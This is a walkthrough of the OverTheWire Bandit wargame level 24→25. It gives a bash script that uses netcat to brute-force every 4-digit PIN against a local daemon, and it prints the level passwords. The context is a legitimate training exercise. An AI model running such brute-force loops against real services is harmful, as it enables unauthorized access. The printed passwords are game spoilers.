Bandit Level 24 → Level 25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinaties, called brute-forcing.


Again, I created a folder inside /tmp and make sure both the newly created folder and all the file related to this level must have proper permission (chmod 755 would be enough).

#!/bin/bash
passwd="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"

for a in {0..9}{0..9}{0..9}{0..9}
do
    echo $passwd' '$a | nc localhost 30002 >> result &
done

I choose to use netcat (nc) but telnet works just as well. The passcode a is being generated by 4 brace expansions. The >> append the output to the file result. The & put the command in background so it can start the next iteration. Doing so save me a lot of time waiting for this script to be done. To improve upon this, I need to find a way to terminate the loop when the correct answer is displayed. However, I didn’t know what the correct message would be at the beginning.

Using the same strategy to find an unique line from Level 8 → Level 9, we see the password for the next level is the unique line of result file.

$ sort result | uniq -u
Correct!
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

Additional References:

Advertisements